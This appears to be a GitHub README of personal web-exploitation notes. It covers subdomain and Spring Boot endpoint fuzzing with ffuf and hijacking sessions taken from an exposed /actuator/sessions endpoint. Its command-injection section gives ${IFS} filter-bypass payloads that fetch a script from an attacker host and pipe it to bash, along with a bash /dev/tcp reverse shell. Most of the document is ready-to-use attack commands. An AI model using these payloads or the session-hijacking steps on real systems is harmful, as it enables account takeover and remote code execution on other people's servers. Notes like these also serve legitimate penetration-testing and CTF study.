Skip to content

Latest commit

 

History

History
69 lines (44 loc) · 3.12 KB

README.md

File metadata and controls

69 lines (44 loc) · 3.12 KB

Web-Exploitation

  • robots.txt
  • sitemap.xml

Virtual host fuzzing

# Command : ffuf -w <wordlist> -u http://<host>.fr/ -H 'Host: FUZZ.<host>.fr' -fs 15949 
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomainstop100000.txt -u http://mywebsite.fr/ -H 'Host: FUZZ.mywebsite.fr' -fs 15949

Spring Boot framework

Detect Spring Boot framework

Check a random page that does not exist as example /qmdkgjrot12dfgg. If the error page return "WhiteLabel Error Page", it's means that the Spring Boot framework is used.

image

Known misconfigured

endpoint Description
/actuator
/actuator/sessions List all the active sessions and their session ids
/actuator/beans
/actuator/health
/actuator/env
/actuator/mappings This provides a detailed overview of all the mappings configured in the application. On browsing to the endpoint, we see a JSON response containing information about the request mappings in place, including the requests' methods (GET,POST,etc.)

Bruteforce famous Spring boot subdomain misconfigured

known specific wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://mywebsite.com/FFUZ -ic -t 10

Exploit /actuator/sessions

image

We see the session identifier, which we can grab and set as a cookie in our browser, using the developer console's Storage tab.

Important note: Sometimes firefox does not allow to add directly in cookies session, consequently, try to add into local storage or session storage. In addition, think to rename the name into JSESSIONID.

image

Once the session identifier add, try to access to the authenticated user or admin webpags (e.g. /admin, /console, etc.).

Important note: Sometimes the session identifier is expired. In this case, reload the /actuator/sessions page, take a new session identifier then modify it into the developer console's storage tab.

Command injection

Often the field does not accept white spaces, so to bypass this we can use ${IFS} as a delimiter, which is a special shell variable that stands for Internal Field Separator and defaults to a space (followed by a tab and a newline) in shells like Bash and sh.

Example of command injection using ${IFS} as a delimiter.

#Think to execute 'python -m http.server 4444' on the attacker side before

test;curl${IFS}http://10.0.0.1:4444; => try to acconect to the attacker server
test;curl${IFS}http://10.10.0.1:4444/reverse.sh|bash; => try to connect to the attacker server, donwload a reverse shell (reverse.sh) then execute it using bash.

#Example of revershe shell generation in the shell
#echo -e '#!/bin/bash\nsh -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > reverse.sh
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.0.0.1/4449 0>&1' > reverse.sh